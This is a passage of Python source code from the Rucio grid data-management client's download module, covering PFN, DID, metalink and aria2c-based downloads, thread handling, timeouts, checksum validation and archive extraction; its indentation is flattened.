self.trace_tpl['vo'] = self.client.vo
self.trace_tpl['eventType'] = 'download'
self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]
self.use_cea_threshold = 10
self.extraction_tools = []
# unzip <archive_file_path> <did_name> -d <dest_dir_path>
extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger=self.logger))
# tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger=self.logger))
self.extract_scope_convention = config_get('common', 'extract_scope', False, None)
def download_pfns(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
adler32 - Optional: The adler32 checksum to compare the downloaded file's adler32 checksum with
md5 - Optional: The md5 checksum to compare the downloaded file's md5 checksum with
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
item['input_dids'] = {DIDType(did_str): {}}
if not did_str or not pfn or not rse:
logger(logging.DEBUG, item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger(logging.DEBUG, 'Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger(logging.DEBUG, did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'), did_scope, item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
did_path_name = did_name
if did_name.startswith('/'):
did_path_name = did_name[1:]
dest_file_path = os.path.join(dest_dir_path, did_path_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options['ignore_checksum'] = 'adler32' not in item and 'md5' not in item
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
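# Illustrative usage sketch (the DID, PFN and RSE values below are placeholders):
#
# client = DownloadClient()
# client.download_pfns([{
#     'did': 'user.jdoe:file.root',
#     'pfn': 'https://example-se.cern.ch:443/path/user.jdoe/file.root',
#     'rse': 'EXAMPLE_DATADISK',
# }])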
def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
impl - Optional: name of the protocol implementation to be used to download this item.
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly chosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
transfer_speed_timeout - Optional: Minimum allowed transfer speed (in KBps). Ignored if transfer_timeout set. Otherwise, used to compute default timeout (Default: 500)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items))
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger(logging.INFO, 'Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
for metalink in metalinks:
did = DIDType(metalink['did'])
did_to_options[did] = [item]
metalink['input_dids'] = {did: {}}
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}, traces_copy_out=None):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
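# e.g. a suggestion of 10 threads for 3 files yields min(3, 10, 5) = 3 worker threads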
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger(logging.INFO, 'Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '')
return list(output_queue.queue)
logger(logging.INFO, 'Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(0, num_threads):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'traces_copy_out': traces_copy_out,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger(logging.WARNING, 'Failed to start thread %d' % thread_num)
logger(logging.DEBUG, error)
try:
logger(logging.DEBUG, 'Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger(logging.DEBUG, '%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, traces_copy_out, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
os.killpg(os.getpgid(0), signal.SIGINT)  # signal the whole process group; os.getpgid() requires a pid argument
break
except Exception as error:
logger(logging.ERROR, '%sFailed to download item' % log_prefix)
logger(logging.DEBUG, error)
@staticmethod
def _compute_actual_transfer_timeout(item):
"""
Merge the two options related to timeout into the value which will be used for protocol download.
:param item: dictionary that describes the item to download
:return: timeout in seconds
"""
default_transfer_timeout = 360
default_transfer_speed_timeout = 500 # KBps
# Static additive increment of the speed timeout. To include the static cost of
# establishing connections and download of small files
transfer_speed_timeout_static_increment = 60
transfer_timeout = item.get('merged_options', {}).get('transfer_timeout')
if transfer_timeout is not None:
return transfer_timeout
transfer_speed_timeout = item.get('merged_options', {}).get('transfer_speed_timeout')
bytes_ = item.get('bytes')
if not bytes_ or transfer_speed_timeout is None:
return default_transfer_timeout
if not transfer_speed_timeout > 0:
transfer_speed_timeout = default_transfer_speed_timeout
# Convert from KBytes/s to bytes/s
transfer_speed_timeout = transfer_speed_timeout * 1000
timeout = bytes_ // transfer_speed_timeout + transfer_speed_timeout_static_increment
return timeout
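# Worked example: a 2 GB file with transfer_speed_timeout=500 (KBps) and no explicit
# transfer_timeout gives 2_000_000_000 // (500 * 1000) + 60 = 4060 seconds.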
def _download_item(self, item, trace, traces_copy_out, log_prefix=''):
"""
Downloads the given item and sends traces for success/failure.
(This function is meant to be used as class internal only)
:param item: dictionary that describes the item to download
:param trace: dictionary representing a pattern of trace that will be send
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
:returns: dictionary with all attributes from the input item and a clientState attribute
"""
logger = self.logger
pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None
did_scope = item['scope']
did_name = item['name']
did_str = '%s:%s' % (did_scope, did_name)
logger(logging.INFO, '%sPreparing download of %s' % (log_prefix, did_str))
trace['scope'] = did_scope
trace['filename'] = did_name
trace.setdefault('datasetScope', item.get('dataset_scope', ''))
trace.setdefault('dataset', item.get('dataset_name', ''))
trace.setdefault('filesize', item.get('bytes'))
trace.setdefault('clientState', 'PROCESSING')
trace.setdefault('stateReason', 'UNKNOWN')
dest_file_paths = item['dest_file_paths']
# appending trace to list reference, if the reference exists
if traces_copy_out is not None:
traces_copy_out.append(trace)
# if file already exists make sure it exists at all destination paths, set state, send trace, and return
for dest_file_path in dest_file_paths:
if os.path.isfile(dest_file_path):
if item.get('merged_options', {}).get('check_local_with_filesize_only', False):
local_filesize = os.stat(dest_file_path).st_size
if item.get('bytes') != local_filesize:
logger(logging.INFO, '%sFile with same name exists locally, but filesize mismatches: %s' % (log_prefix, did_str))
logger(logging.DEBUG, '%slocal filesize: %d bytes, expected filesize: %d bytes' % (log_prefix, local_filesize, item.get('bytes')))
continue
elif not item.get('merged_options', {}).get('ignore_checksum', False):
verified, _, _ = _verify_checksum(item, dest_file_path)
if not verified:
logger(logging.INFO, '%sFile with same name exists locally, but checksum mismatches: %s' % (log_prefix, did_str))
continue
logger(logging.INFO, '%sFile exists already locally: %s' % (log_prefix, did_str))
for missing_file_path in dest_file_paths:
if not os.path.isfile(missing_file_path):
logger(logging.DEBUG, "copying '%s' to '%s'" % (dest_file_path, missing_file_path))
shutil.copy2(dest_file_path, missing_file_path)
item['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'ALREADY_DONE'
send_trace(trace, self.client.host, self.client.user_agent)
return item
# check if file has replicas
sources = item.get('sources')
if not sources or not len(sources):
logger(logging.WARNING, '%sNo available source found for file: %s' % (log_prefix, did_str))
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
trace['stateReason'] = 'No available sources'
self._send_trace(trace)
return item
# checking Pcache
storage_prefix = None
if pcache:
# to check only first replica is enough
pfn = sources[0]['pfn']
rse_name = sources[0]['rse']
# protocols are needed to extract deterministic part of the pfn
scheme = None
prots = self.client.get_protocols(rse_name)
for prot in prots:
if prot['scheme'] in pfn and prot['prefix'] in pfn:
scheme = prot['scheme']
storage_prefix = prot['prefix']
# proceed with the actual check
logger(logging.INFO, 'Checking whether %s is in pcache' % dest_file_path)
pcache_state = None
hardlink_state = None
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Pcache failure: %s' % str(e))
# if file found in pcache, send trace and return
if pcache_state == 0 and hardlink_state == 1:
logger(logging.INFO, 'File found in pcache.')
item['clientState'] = 'FOUND_IN_PCACHE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'FOUND_IN_PCACHE'
self._send_trace(trace)
return item
else:
logger(logging.INFO, 'File not found in pcache.')
# try different PFNs until one succeeded
temp_file_path = item['temp_file_path']
success = False
i = 0
while not success and i < len(sources):
source = sources[i]
i += 1
pfn = source['pfn']
rse_name = source['rse']
scheme = pfn.split(':')[0]
try:
rse = rsemgr.get_rse_info(rse_name, vo=self.client.vo)
except RucioException as error:
logger(logging.WARNING, '%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error))
trace['stateReason'] = str(error)
continue
trace['remoteSite'] = rse_name
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
trace['protocol'] = scheme
transfer_timeout = self._compute_actual_transfer_timeout(item)
timeout_log_string = ""
if transfer_timeout:
timeout_log_string = " and timeout of %ds" % transfer_timeout
logger(logging.INFO, '%sTrying to download with %s%s from %s: %s ' % (log_prefix, scheme, timeout_log_string, rse_name, did_str))
impl = item.get('impl')
if impl:
logger(logging.INFO, '%sUsing Implementation (impl): %s ' % (log_prefix, impl))
try:
protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme, impl=impl, auth_token=self.auth_token, logger=logger)
protocol.connect()
except Exception as error:
logger(logging.WARNING, '%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
logger(logging.DEBUG, 'scheme: %s, exception: %s' % (scheme, error))
trace['stateReason'] = str(error)
continue
logger(logging.INFO, '%sUsing PFN: %s' % (log_prefix, pfn))
attempt = 0
retries = 2
# do some retries with the same PFN if the download fails
while not success and attempt < retries:
attempt += 1
item['attemptnr'] = attempt
if os.path.isfile(temp_file_path):
logger(logging.DEBUG, '%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
os.unlink(temp_file_path)
start_time = time.time()
try:
protocol.get(pfn, temp_file_path, transfer_timeout=transfer_timeout)
success = True
except Exception as error:
logger(logging.DEBUG, error)
trace['clientState'] = str(type(error).__name__)
trace['stateReason'] = str(error)
end_time = time.time()
if success and not item.get('merged_options', {}).get('ignore_checksum', False):
verified, rucio_checksum, local_checksum = _verify_checksum(item, temp_file_path)
if not verified:
success = False
os.unlink(temp_file_path)
logger(logging.WARNING, '%sChecksum validation failed for file: %s' % (log_prefix, did_str))
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
trace['clientState'] = 'FAIL_VALIDATE'
trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)
if not success:
logger(logging.WARNING, '%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
self._send_trace(trace)
protocol.close()
if not success:
logger(logging.ERROR, '%sFailed to download file %s' % (log_prefix, did_str))
item['clientState'] = 'FAILED'
return item
dest_file_path_iter = iter(dest_file_paths)
first_dest_file_path = next(dest_file_path_iter)
logger(logging.DEBUG, "renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
os.rename(temp_file_path, first_dest_file_path)
# if the file was downloaded with success, it can be linked to pcache
if pcache:
logger(logging.INFO, 'File %s is going to be registered into pcache.' % dest_file_path)
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path)
logger(logging.INFO, 'File %s is now registered into pcache.' % first_dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Failed to load file to pcache: %s' % str(e))
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
trace['clientState'] = 'DONE'
trace['stateReason'] = 'OK'
item['clientState'] = 'DONE'
self._send_trace(trace)
duration = round(end_time - start_time, 2)
size = item.get('bytes')
size_str = sizefmt(size, self.is_human_readable)
if size and duration:
rate = round((size / duration) * 1e-6, 2)
logger(logging.INFO, '%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
else:
logger(logging.INFO, '%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))
file_items_in_archive = item.get('archive_items', [])
if len(file_items_in_archive) > 0:
logger(logging.INFO, '%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))
archive_file_path = first_dest_file_path
for file_item in file_items_in_archive:
extraction_ok = False
extract_file_name = file_item['name']
dest_file_path_iter = iter(file_item['dest_file_paths'])
first_dest_file_path = next(dest_file_path_iter)
dest_dir = os.path.dirname(first_dest_file_path)
logger(logging.DEBUG, '%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
for extraction_tool in self.extraction_tools:
if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
extraction_ok = True
break
if not extraction_ok:
logger(logging.ERROR, 'Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
continue
first_dest_file_path = os.path.join(dest_dir, extract_file_name)
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
if not item.get('shall_keep_archive'):
logger(logging.DEBUG, '%sDeleting archive %s' % (log_prefix, did_name))
os.remove(archive_file_path)
return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}, deactivate_file_download_exceptions=False):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It only can download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly chosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
item['no_resolve_archives'] = True
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items))
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger(logging.ERROR, 'Unknown exception during aria2c download')
self.logger(logging.DEBUG, error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
:returns: a tuple with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
logger(logging.INFO, 'Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger(logging.DEBUG, 'Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger(logging.DEBUG, to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger(logging.DEBUG, 'Failed to start aria2c with port: %d' % port)
logger(logging.DEBUG, 'aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
"""
Uses aria2c to download the given items. Aria2c needs to be started
as RPC background process first and a RPC proxy is needed.
(This function is meant to be used as class internal only)
:param items: list of dictionaries containing one dict for each file to download
:param aria_rcp: RPCProxy to the aria2c process
:param rpc_auth: the rpc authentication token
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
"""
logger = self.logger
gid_to_item = {} # maps an aria2c download id (gid) to the download item
pfn_to_rse = {}
items_to_queue = [item for item in items]
# items get removed from gid_to_item when they are complete or failed
while len(gid_to_item) or len(items_to_queue):
num_queued = 0
# queue up to 100 files and then check arias status
while (num_queued < 100) and len(items_to_queue):
item = items_to_queue.pop()
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
trace = {'scope': file_scope,
'filename': file_name,
'datasetScope': item.get('dataset_scope', ''),
'dataset': item.get('dataset_name', ''),
'protocol': 'https',
'remoteSite': '',
'filesize': item.get('bytes', None),
'transferStart': time.time(),
'transferEnd': time.time()}
trace.update(self.trace_tpl)
trace.update(trace_custom_fields)
# get pfns from all replicas
pfns = []
for src in item['sources']:
pfn = src['pfn']
if pfn[0:4].lower() == 'davs':
pfn = pfn.replace('davs', 'https', 1)
pfns.append(pfn)
pfn_to_rse[pfn] = src['rse']
# does file exist and are sources available?
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
if os.path.isfile(dest_file_path):
logger(logging.INFO, 'File exists already locally: %s' % file_did_str)
item['clientState'] = 'ALREADY_DONE'
trace['clientState'] = 'ALREADY_DONE'
self._send_trace(trace)
elif len(pfns) == 0:
logger(logging.WARNING, 'No available source found for file: %s' % file_did_str)
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
else:
item['trace'] = trace
options = {'dir': os.path.dirname(dest_file_path),
'out': os.path.basename(item['temp_file_path'])}
gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
gid_to_item[gid] = item
num_queued += 1
logger(logging.DEBUG, 'Queued file: %s' % file_did_str)
# get some statistics
aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
num_active = int(aria_stat['numActive'])
num_waiting = int(aria_stat['numWaiting'])
num_stopped = int(aria_stat['numStoppedTotal'])
# save start time if one of the active downloads has started
active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
for dlinfo in active:
gid = dlinfo['gid']
if int(dlinfo['completedLength']) > 0:
gid_to_item[gid].setdefault('transferStart', time.time())
stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
for dlinfo in stopped:
gid = dlinfo['gid']
item = gid_to_item[gid]
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
temp_file_path = item['temp_file_path']
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
                # ensure we didn't miss the active state (e.g. a very fast download)
start_time = item.setdefault('transferStart', time.time())
end_time = item.setdefault('transferEnd', time.time())
# get used pfn for traces
trace = item['trace']
for uri in dlinfo['files'][0]['uris']:
if uri['status'].lower() == 'used':
trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
# ensure file exists
status = dlinfo.get('status', '').lower()
if status == 'complete' and os.path.isfile(temp_file_path):
# checksum check
skip_check = item.get('ignore_checksum', False)
rucio_checksum = 0 if skip_check else item.get('adler32')
local_checksum = 0 if skip_check else adler32(temp_file_path)
if str(rucio_checksum).lstrip('0') == str(local_checksum).lstrip('0'):
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
# remove .part ending
os.rename(temp_file_path, dest_file_path)
# calculate duration
duration = round(end_time - start_time, 2)
duration = max(duration, 0.01) # protect against 0 division
size = item.get('bytes', 0)
rate = round((size / duration) * 1e-6, 2)
size_str = sizefmt(size, self.is_human_readable)
logger(logging.INFO, 'File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
size_str,
duration,
rate))
else:
os.unlink(temp_file_path)
logger(logging.WARNING, 'Checksum validation failed for file: %s' % file_did_str)
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
item['clientState'] = 'FAIL_VALIDATE'
trace['clientState'] = 'FAIL_VALIDATE'
else:
logger(logging.ERROR, 'Failed to download file: %s' % file_did_str)
logger(logging.DEBUG, 'Aria2c status: %s' % status)
item['clientState'] = 'FAILED'
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
self._send_trace(trace)
del item['trace']
aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
del gid_to_item[gid]
if len(stopped) > 0:
logger(logging.INFO, 'Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))
return items
def _resolve_one_item_dids(self, item):
"""
        Resolve scopes or wildcard DIDs to lists of full DID names.
:param item: One input item
"""
dids = item.get('did')
